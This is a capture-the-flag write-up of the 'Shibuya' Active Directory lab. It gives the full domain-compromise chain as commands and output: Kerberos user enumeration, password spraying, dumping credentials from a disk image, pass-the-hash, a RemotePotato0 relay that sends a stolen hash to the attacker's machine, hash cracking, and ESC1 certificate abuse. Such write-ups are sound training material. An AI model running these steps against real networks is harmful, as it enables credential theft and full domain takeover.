Skip to main content
Luban’s Docs
Luban’s Docs
  1. Posts/

HTB x VL Shibuya: Formal Write-up

·3041 words·15 mins· loading · loading · ·
HackTheBox Vulnlab Windows ADCS ESC1 PTH
Safwan Luban
Author
Safwan Luban
Security Engineer
Table of Contents
featured.png

Synopsis:
#

Shibuya, a challenging hard-rated HTB x Vulnlab Active Directory box, requires a multi-stage attack chain involving credential harvesting, session hijacking, and a critical Active Directory Certificate Services (ADCS) misconfiguration. The initial foothold is gained by enumerating domain users via Kerberos and discovering a weak password for one user. This access is quickly leveraged to find a service account’s plaintext password stored in its user description, granting access to a critical SMB share. Inside the share, a Windows Imaging (.wim) file contains cached domain credentials for another user. By extracting the necessary registry hives from this image, a hash is recovered and used to reset the user’s password, enabling lateral movement to an interactive shell on the domain controller via SSH. Privilege escalation is a two-step process: first, a Cross-Session Relay attack is performed to capture and crack the hash of a high-privileged user with an active session. With these new credentials, the final pivot is made by exploiting a vulnerable ADCS certificate template (ESC1) to request a certificate as a domain administrator, ultimately yielding the administrator’s NT hash and achieving full domain compromise.

Active Recon:
#

The initial phase of the operation involved active reconnaissance against the target IP address, 10.10.83.243. A detailed service version scan was conducted using Nmap to identify open services and gather information about the target system’s configuration.

┌──(toothless5143㉿kali)-[~]
└─$ nmap -sV -Pn 10.10.83.243
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-29 13:45 +06
Nmap scan report for 10.10.83.243
Host is up (0.21s latency).
Not shown: 989 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-29 07:45:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: shibuya.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
Service Info: Host: AWSJPDC0522; OS: Windows; CPE: cpe:/o:microsoft:windows

The scan results confirmed the host was a Windows machine operating as a domain controller. Key services such as Kerberos (port 88) and LDAP (port 3268) were active, and the LDAP banner revealed the domain name shibuya.vl and hostname AWSJPDC0522.

To ensure proper name resolution for all subsequent commands, these names were added to the local /etc/hosts file.

┌──(toothless5143㉿kali)-[~]
└─$ echo "10.10.83.243 shibuya.vl AWSJPDC0522.shibuya.vl" | sudo tee -a /etc/hosts
10.10.83.243 shibuya.vl AWSJPDC0522.shibuya.vl

With the domain name known, a user enumeration attack was performed against the Kerberos service using Kerbrute. This tool attempts to validate a list of potential usernames against the domain controller without causing account lockouts, identifying which ones exist within the domain.

┌──(toothless5143㉿kali)-[~]
└─$ kerbrute userenum --dc 10.10.83.243 -d shibuya.vl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: dev (n/a) - 05/29/25 - Ronnie Flathers @ropnop

2025/05/29 13:56:57 >  Using KDC(s):
2025/05/29 13:56:57 >   10.10.83.243:88

2025/05/29 13:57:00 >  [+] VALID USERNAME:       [email protected]
2025/05/29 13:57:04 >  [+] VALID USERNAME:       [email protected]

This process successfully identified two valid domain usernames: purple and red. These usernames became the primary targets for the next phase of credential-based attacks.

Vulnerability Analysis & Exploitation:
#

Having identified valid usernames, the next logical step was to test for weak or common passwords. The tool netexec was used to perform a password spray, which confirmed that the user red had a password of red. This provided the initial valid credential set.

┌──(toothless5143㉿kali)-[~]
└─$ netexec smb shibuya.vl -u red -p red -k
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)

SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red

With a foothold as the user red, further enumeration of domain users was conducted to gather more information. The --users flag in netexec retrieves details about domain user accounts, including their descriptions.

┌──(toothless5143㉿kali)-[~]
└─$ netexec smb shibuya.vl -u red -p red -k --users
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)

SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain

SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain

SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       <REDACTED>

This enumeration revealed a significant security misconfiguration: the password for the service account svc_autojoin, was stored in plain text in its Active Directory description field.

This credential was then used to list the accessible SMB shares on the domain controller to search for sensitive files or information.

┌──(toothless5143㉿kali)-[~]
└─$ smbclient -L //shibuya.vl/ -U svc_autojoin
Password for [WORKGROUP\svc_autojoin]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        images$         Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
        users           Disk

The share listing showed a share named images$. This share was accessed using the svc_autojoin credentials to investigate its contents.

┌──(toothless5143㉿kali)-[~]
└─$ smbclient //shibuya.vl/images$ -U svc_autojoin
Password for [WORKGROUP\svc_autojoin]:
Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Sun Feb 16 17:24:08 2025
  ..                                DHS        0  Wed Feb 19 18:59:37 2025
  AWSJPWK0222-01.wim                  A  8264070  Sun Feb 16 17:23:41 2025
  AWSJPWK0222-02.wim                  A 50660968  Sun Feb 16 17:23:45 2025
  AWSJPWK0222-03.wim                  A 32065850  Sun Feb 16 17:23:47 2025
  vss-meta.cab                        A   365686  Sun Feb 16 17:22:37 2025

Inside the share, several Windows Imaging Format (.wim) files were discovered. These files are disk images and can contain entire offline operating systems, including sensitive files like registry hives.

Post Exploitation:
#

The .wim files represented a valuable source of offline data. The file AWSJPWK0222-02.wim was chosen for analysis. Because the file was large and prone to transfer timeouts with smbclient, the entire SMB share was mounted directly to the local filesystem for reliable access. First, a directory was created to serve as the mount point.

┌──(toothless5143㉿kali)-[~]
└─$ sudo mkdir -p /mnt/images

Next, the images$ share was mounted to this directory using the svc_autojoin credentials.

┌──(toothless5143㉿kali)-[~]
└─$ sudo mount -t cifs //shibuya.vl/images$ /mnt/images -o username=svc_autojoin
Password for svc_autojoin@//shibuya.vl/images$:

Once the share was mounted, the target .wim file was copied to the local machine. The contents of this image file were then extracted using 7z, specifically targeting the SAM, SYSTEM, and SECURITY registry hives, which contain local user credentials and cached domain credentials.

┌──(toothless5143㉿kali)-[~]
└─$ cp /mnt/images/AWSJPWK0222-02.wim .

Once mounted, the .wim file was copied locally. The contents of the image were then extracted using 7z, specifically targeting the SAM, SYSTEM, and SECURITY registry hives, which store local user credentials and system security information.

┌──(toothless5143㉿kali)-[~]
└─$ 7z e AWSJPWK0222-02.wim SAM SYSTEM SECURITY

With the registry hives extracted, impacket-secretsdump was used to parse these offline files and dump any stored credentials.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: <REDACTED>
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Dumping cached domain logon information (domain/username:hash)
SHIBUYA.VL/Simon.Watson:$DCC2$10240#Simon.Watson#<REDACTED>: (2025-02-16 11:17:56)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:<REDACTED>
$MACHINE.ACC:aad3b435b51404eeaad3b435b51404ee:<REDACTED>
[*] DPAPI_SYSTEM
dpapi_machinekey:<REDACTED>
dpapi_userkey:<REDACTED>
[*] NL$KM
 0000   <REDACTED>
 0010   <REDACTED>
 0020   <REDACTED>
 0030   <REDACTED>
NL$KM:<REDACTED>
[*] Cleaning up...

This process successfully extracted the cached NTLM hash for the domain user SHIBUYA.VL\Simon.Watson. This hash provided the means for the next stage of lateral movement.

Lateral Movement:
#

The recovered NTLM hash for Simon.Watson was leveraged to move laterally within the network. A Pass-the-Hash attack was initiated using impacket-smbclient to authenticate to the domain controller as Simon.Watson.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-smbclient [email protected] -hashes :5d8c<REDACTED>a0d50
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# ls
drw-rw-rw-          0  Sun Feb 16 16:50:59 2025 .
drw-rw-rw-          0  Wed Feb 19 18:59:37 2025 ..
drw-rw-rw-          0  Sat Feb 15 12:49:31 2025 Administrator
drw-rw-rw-          0  Sat Feb 15 21:48:20 2025 All Users
drw-rw-rw-          0  Sat Feb 15 21:49:12 2025 Default
drw-rw-rw-          0  Sat Feb 15 21:48:20 2025 Default User
-rw-rw-rw-        174  Sat Feb 15 21:46:52 2025 desktop.ini
drw-rw-rw-          0  Wed Feb 19 01:29:42 2025 nigel.mills
drw-rw-rw-          0  Sat Feb 15 12:49:31 2025 Public
drw-rw-rw-          0  Wed Feb 19 01:36:45 2025 simon.watson

While this provided file-level access, a more interactive shell was desired. The Nmap scan had shown that SSH was open on the server. To gain interactive access, impacket-changepasswd was utilized with the user’s hash to reset Simon.Watson ’s password to a known value, Password123.

┌──(toothless5143㉿kali)-[~]
└─$ impacket-changepasswd shibuya.vl/[email protected] -hashes :5d8c<REDACTED>a0d50 -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Changing the password of shibuya.vl\simon.watson
[*] Connecting to DCE/RPC as shibuya.vl\simon.watson
[*] Password was changed successfully.

With the password successfully changed, a standard SSH connection was established to the domain controller as simon.watson, providing an interactive command shell on the target system.

┌──(toothless5143㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host 'shibuya.vl (10.10.83.243)' can't be established.
ED25519 key fingerprint is SHA256:SiXhmjQMScl7eQgH4/uyVXXTsCHM6diy6fh80l4zzJQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shibuya.vl' (ED25519) to the list of known hosts.
[email protected]'s password:
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

Privilege Escalation:
#

Now with interactive user-level access, the final objective was to escalate privileges to a domain administrator. Previous attempts to enumerate LDAP from the outside had failed. To overcome this, a dynamic SOCKS proxy was created through the active SSH session. This allowed tools on the attacker’s machine to route their traffic through the compromised host, as if they were running from inside the network.

┌──(toothless5143㉿kali)-[~]
└─$ ssh [email protected] -D1080 -N
[email protected]'s password:

With the tunnel active, proxychains was used to run bloodhound-python. This tool comprehensively enumerates the Active Directory environment, mapping out users, groups, computers, and potential attack paths.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q bloodhound-python -u simon.watson -p Password123 -ns 10.10.83.243 -d shibuya.vl -c All --zip

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: shibuya.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: awsjpdc0522.shibuya.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: awsjpdc0522.shibuya.vl
INFO: Found 504 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: AWSJPWK0222.shibuya.vl
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: AWSJPDC0522.shibuya.vl
WARNING: Could not resolve: AWSJPWK0222.shibuya.vl: The DNS query name does not exist: AWSJPWK0222.shibuya.vl.
INFO: Done in 00M 45S
INFO: Compressing output into 20250529155505_bloodhound.zip

The BloodHound data revealed that another user, nigel.mills, had an active session on the domain controller. This presented an opportunity for a session-based attack.

The RemotePotato0 tool was uploaded to the server to perform a Cross-Session Relay attack. A Cross-Session Relay attack in Active Directory is a sophisticated technique that leverages an existing, legitimate user’s session on a machine to gain unauthorized access to other resources on the network. It’s a specialized form of an NTLM relay attack.

To facilitate this, a socat listener was set up on the attacker’s machine to redirect traffic from the victim server, which is a necessary step for the exploit.

┌──(toothless5143㉿kali)-[~]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.83.243:9000

After uploading RemotePotato0 to the server, it was executed to capture the NTLMv 2 hash from nigel.mills ’s active session.

PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.8.6.64 -x 10.8.6.64 -p 9000 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.8.6.64 to your victim machine on port 9000
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9000
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 9000 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9000
[+] User hash stolen!

NTLMv2 Client   : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash     : Nigel.Mills::SHIBUYA:<REDACTED>

The captured hash was cracked offline using hashcat and the rockyou.txt wordlist, revealing the user’s password.

┌──(toothless5143㉿kali)-[~]
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-penryn-AMD Ryzen 9 6900HX with Radeon Graphics, 1438/2941 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
NIGEL.MILLS::SHIBUYA:<REDACTED>:<REDACTED>
Session..........: hashcat
Status...........: Cracked
<SNIP>
Stopped: Sun Apr 20 17:59:53 2025

With the credentials for nigel.mills, further enumeration was conducted, focusing on Active Directory Certificate Services (ADCS) using netexec and certipy.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q netexec ldap shibuya.vl -u nigel.mills -p <REDACTED> -M adcs

SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
LDAP        10.10.64.180    389    AWSJPDC0522      [+] shibuya.vl\nigel.mills:<REDACTED>
ADCS        10.10.64.180    389    AWSJPDC0522      [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.64.180    389    AWSJPDC0522      Found PKI Enrollment Server: AWSJPDC0522.shibuya.vl
ADCS        10.10.64.180    389    AWSJPDC0522      Found CN: shibuya-AWSJPDC0522-CA

The certipy scan uncovered a critical misconfiguration known as ESC 1 in the “ShibuyaWeb” certificate template.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q certipy find -u nigel.mills -p <REDACTED> -dc-ip 10.10.83.243 -dns-tcp -vulnerable -enabled -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA
[!] Got error while trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via RRP
[*] Got CA configuration for 'shibuya-AWSJPDC0522-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : shibuya-AWSJPDC0522-CA
    DNS Name                            : AWSJPDC0522.shibuya.vl
    Certificate Subject                 : CN=shibuya-AWSJPDC0522-CA, DC=shibuya, DC=vl
    Certificate Serial Number           : 2417712CBD96C58449CFDA3BE3987F52
    Certificate Validity Start          : 2025-02-15 07:24:14+00:00
    Certificate Validity End            : 2125-02-15 07:34:13+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SHIBUYA.VL\Administrators
      Access Rights
        ManageCertificates              : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        ManageCa                        : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
        Enroll                          : SHIBUYA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : ShibuyaWeb
    Display Name                        : ShibuyaWeb
    Certificate Authorities             : shibuya-AWSJPDC0522-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Any Purpose
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 75 years
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SHIBUYA.VL\t1_admins
                                          SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SHIBUYA.VL\_admin
        Write Owner Principals          : SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Dacl Principals           : SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Property Principals       : SHIBUYA.VL\Domain Admins

SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
    [!] Vulnerabilities
      ESC1                              : 'SHIBUYA.VL\\t1_admins' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'SHIBUYA.VL\\t1_admins' can enroll and template can be used for any purpose
      ESC3                              : 'SHIBUYA.VL\\t1_admins' can enroll and template has Certificate Request Agent EKU set

This vulnerability allowed any authenticated user to request a certificate for any other user, including administrators, because the “Enrollee Supplies Subject” flag was enabled.

This vulnerability was exploited by requesting a certificate for the user _admin using the ShibuyaWeb template.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -dc-ip 10.10.83.243 -target shibuya.vl -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -key-size 4096

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN '_admin'
[*] Certificate has no object SID
[*] Saved certificate and private key to '_admin.pfx'

This command successfully generated a certificate and private key (_admin.pfx) that could be used to authenticate as the _admin user.

This certificate was then used with certipy auth to perform a Kerberos authentication and retrieve the _admin user’s NT hash.

┌──(toothless5143㉿kali)-[~]
└─$ certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.10.83.243
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

With the NT hash of a domain administrator, full control was achieved. The final step was to use this hash with netexec in a Pass-the-Hash attack to execute a command on the domain controller and read the root flag from the administrator’s desktop.

┌──(toothless5143㉿kali)-[~]
└─$ proxychains -q netexec smb shibuya.vl -u _admin -H <REDACTED> -x 'type c:\users\administrator\desktop\root.txt'

SMB         10.10.64.180    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.64.180    445    AWSJPDC0522      [+] shibuya.vl\_admin:<REDACTED>(Pwn3d!)
SMB         10.10.64.180    445    AWSJPDC0522      [+] Executed command via wmiexec
SMB         10.10.64.180    445    AWSJPDC0522      VL{<REDACTED>}

Signing out,

  • Toothless
Reply by Email